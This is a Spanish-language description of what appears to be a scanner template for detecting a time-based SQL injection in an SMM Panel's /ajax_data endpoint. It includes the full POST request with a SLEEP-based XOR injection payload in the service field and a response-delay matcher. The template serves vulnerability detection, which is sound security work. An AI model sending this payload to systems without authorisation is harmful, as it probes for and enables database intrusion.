
Plantilla de detección de inyección SQL basada en tiempo para SMM Panel. Envía solicitudes POST manipuladas a `/ajax_data` e identifica endpoints vulnerables mediante análisis de retardo de respuesta.
Detección de Inyección SQL basada en tiempo para SMM Panel
Esta plantilla detecta una vulnerabilidad de Inyección SQL basada en tiempo en el parámetro service_detail del SMM Panel a través de solicitudes HTTP POST a /ajax_data. La explotación puede permitir a atacantes remotos acceder a datos sensibles o escalar privilegios.
La herramienta envía una solicitud POST manipulada:
POST /ajax_data
Content-Type: application/x-www-form-urlencoded
action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
Si el tiempo de respuesta es mayor a 5 segundos, indica un endpoint vulnerable.
- Método: POST
- Ruta: {{BaseURL}}/ajax_data
- Encabezados: Content-Type: application/x-www-form-urlencoded
- Cuerpo: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Comparador: duración > 5 segundos
